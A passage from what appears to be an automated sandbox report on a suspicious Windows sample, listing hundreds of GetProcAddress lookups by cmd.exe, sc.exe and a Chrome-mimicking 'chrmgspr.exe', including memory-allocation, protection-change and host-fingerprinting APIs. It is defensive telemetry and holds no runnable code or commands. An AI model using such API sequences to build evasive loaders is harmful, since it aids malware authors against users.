00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00006072)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00006072)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006016)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006128)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005936)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005936)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" 